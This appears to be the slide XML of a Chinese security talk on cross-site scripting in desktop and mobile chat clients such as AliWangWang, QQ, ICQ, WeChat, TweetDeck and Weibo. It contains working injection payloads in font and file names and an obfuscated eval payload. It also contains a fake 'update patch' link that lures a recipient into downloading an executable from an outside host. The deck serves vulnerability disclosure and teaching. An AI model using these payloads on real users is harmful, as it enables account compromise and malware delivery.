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944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12933506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hyperlink" Target="mailto:evi1m0.bat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hackersoul.com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hyperlink" Target="http://evi1m0.sinaapp.com/down.png'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hyperlink" Target="http://id.b.qq.com/hrtx/clientcall/clientInfo/newAllInOne?objective_qquin=2333350888&amp;orignal_qquin=123230273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hyperlink" Target="http://www.xiami.com/accounts/pcsuccess?user_id=12345678&amp;type=XMac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8000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>去年跨过的客户端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270000" y="5473700"/>
            <a:ext cx="10464800" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="403097">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2898"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="403097">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3795">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>evi1m0.bat@gmail.com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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>阿里旺旺客户端XSS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73801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4200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>一、概述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>能显示表情图片成了现在的聊天软件必备基本功能，这就需要支持展示富文本的控件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>聊天软件主要用到两种富文本格式：RTF和HTML格式，RTF可以采用RichEdit、HTML可以选择浏览器内核，比如Windows自带的IE内核。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>阿里旺旺用的就是IE内核作为聊天内容展示区，QQ使用的则是RichEdit，用浏览器内核作为展示的聊天软件，可能就存在被注入JS的风险。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1803400"/>
            <a:ext cx="23749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Date: 2012/01/29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1365250"/>
            <a:ext cx="23749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— zswang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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>阿里旺旺客户端XSS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73801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3348" b="1"/>
              <a:t>二、测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>操作系统会提供当前已经安装的字体列表，比如：宋体、黑体、Verdana等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>这些字体名一般不会出现特殊符号，但通过修改内存、跨进程控制控件的方式可以修改字体名，根据规则：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>append("&lt;font name=" + fontname + "&gt;" + htmlencode(context) + “&lt;/font&gt;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>可以添加一个字体名为：&gt;&lt;script&gt;alert('hello');&lt;/script  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>解析后：&lt;font name=&gt;&lt;script&gt;alert('hello');&lt;/script&gt;context2&lt;/font&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1803400"/>
            <a:ext cx="23749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Date: 2012/01/29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1365250"/>
            <a:ext cx="23749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— zswang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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>阿里旺旺客户端XSS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933449" y="2813049"/>
            <a:ext cx="5372101" cy="4724402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4200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>三、结果</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>构造Payload保存字体后发送消息，接收方打开恶意网址进行软件下载安装，实施攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1803400"/>
            <a:ext cx="23749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Date: 2012/01/29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1365250"/>
            <a:ext cx="23749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— zswang</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="aliwangwang客户端xss1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99250" y="3075225"/>
            <a:ext cx="5372101" cy="5330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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腾讯客户端XSS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Windows企业QQ最新版上线设置对外名片展示功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>QQ头像mini资料展示好友名片，触发XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>多字段（称呼、职位）绕过长度限制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="271c7265e6bb47b7e404cb1b7da4b14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46900" y="2886025"/>
            <a:ext cx="4876800" cy="185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8460b0fc68796a5a4b041009acc2d990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18300" y="5060850"/>
            <a:ext cx="5334000" cy="37455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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ICQ客户端XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="icq200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43590" y="3790841"/>
            <a:ext cx="5517620" cy="38991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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>微信红包XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="weixinhongbao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25188" y="2898932"/>
            <a:ext cx="3788624" cy="5682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weixinhongbao2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11825" y="2898932"/>
            <a:ext cx="4946950" cy="56829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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter客户端TweetDeck XSS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952500" y="2251496"/>
            <a:ext cx="5334000" cy="525060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当Tweet中插入了Unicode字符“♥”，Twitter会将其自动转换为心形的图案，并导致HTML过滤器失效，在TweetDeck中触发XSS。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9613900" y="1485900"/>
            <a:ext cx="23749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— *andy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="twitter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5400" y="6872839"/>
            <a:ext cx="7514000" cy="1579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twitter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87793" y="2931786"/>
            <a:ext cx="5795014" cy="3574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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>新浪微博IOS客户端XSS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WEB发表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>IOS客户端未过滤触发跨站漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— 路人甲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="weiboiosxs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85820" y="3065031"/>
            <a:ext cx="3998959" cy="5998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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不同平台下的客户端“特性”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="apple-vs-android-vs-windows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32323" y="3566715"/>
            <a:ext cx="6940063" cy="46267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Windows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99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用户基数量大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>调用WEB接口较多</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>功能繁多，接口复杂</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>研发团队投入力度大，安全性相对较高</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="windows_8_metro_logo_by_bruellkaefer-d3i37gz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8900" y="533400"/>
            <a:ext cx="1981200" cy="198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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>About Me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SzPct val="45000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>ID: Evi1m0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="45000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>邪红色信息安全组织创始人，知道创宇安全研究员</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="45000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>weibo: @evi1m0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="45000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>http://zhuanlan.zhihu.com/evi1m0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="45000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>site: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.hackersoul.com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Mac OS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99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极简主义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>调用WEB接口少</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>对用户输入过滤相对不够严谨</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>用户基数量相对于Windows较少</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="AppleLogo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6225" y="720725"/>
            <a:ext cx="1606550" cy="1606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IOS &amp; Android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73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调用WEB接口多</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>WEB接口输入过滤相对不严谨</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>两者移植性差，安全问题易被忽略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1270000" y="4207827"/>
            <a:ext cx="10464800" cy="804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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500"/>
              <a:t>案例与利用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0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>混合通信所导致的安全隐患</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tip 1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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952499" y="2774950"/>
            <a:ext cx="5334001" cy="5930900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="345722" indent="-345722"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>不同平台对文件名采取的命名规则不同，导致客户端在通信时存在某些安全隐患。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="26soul.xlarge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10135" y="4588220"/>
            <a:ext cx="3950331" cy="23043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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例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环境：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="0" indent="-635000">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>MacOS 阿里旺旺</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="0" indent="-635000">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Windows阿里旺旺</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例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952500" y="2609850"/>
            <a:ext cx="5565230" cy="618068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修改文件名为Payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>&lt;iframe onload=eval(String.fromCharCode(97,108,101,114,116,40,108,111,99,97,116,105,111,110,41,59))&gt;.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="aliwangwangxss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11094" y="5410200"/>
            <a:ext cx="5565230" cy="2287361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30" name="D1452CF8-BC80-49AF-894E-F0D87E9FEDCC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74408" y="3048000"/>
            <a:ext cx="3810001" cy="191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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例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xfrm>
            <a:off x="952500" y="2609850"/>
            <a:ext cx="5565230" cy="618068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Mac OS阿里旺旺发送构造好文件名后的文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Win客户端触发跨站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="aliwangwangxss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6183" y="3205371"/>
            <a:ext cx="5025341" cy="1907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aliwangwangxss4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69653" y="5471467"/>
            <a:ext cx="4978401" cy="2425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0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>混合通信所导致的安全隐患</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tip 2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952499" y="2774950"/>
            <a:ext cx="5334001" cy="5930900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="345722" indent="-345722"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Windows/Unix/Other平台客户端的非WEB接口输入数据在其他平台上可能会作为WEB接口的数据进行输出。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="26soul.xlarge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10135" y="4588220"/>
            <a:ext cx="3950331" cy="23043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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例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 lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Windows版本阿⾥里旺旺对群成员进⾏行给予管理员/撤销管理员时会发送一条信息提醒, 在Win版本下直接输出,但在阿⾥里旺旺 for Mac版本上会本地域加载消息提醒。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Shape 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例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抓取控件句柄做一个hook，绕过阿里旺旺群名片长度限制，修改阿里旺旺群名片为攻击代码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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WHY?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>历史上的案例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>不同平台下的客户端“特性”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>防御策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>总结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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="阿里旺旺客户端-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56316" y="3154624"/>
            <a:ext cx="9292168" cy="63585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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例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构造引诱下载后门的Payload：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>&lt;div style='height:300px'&gt;&lt;/div&gt;&lt;span style='font-size:20px'&gt;&lt;b&gt;阿里旺旺&lt;/b&gt;更新补丁&lt;/span&gt;&lt;a href=‘http://www.hackersoul.com/demo.exe‘/&gt;&lt;img src='</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" u="sng">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evi1m0.sinaapp.com/down.png'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>&gt;&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Shape 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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952500" y="2609850"/>
            <a:ext cx="5419725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Windows版本阿里旺旺对群成员进行职务操作时，会有消息提醒功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
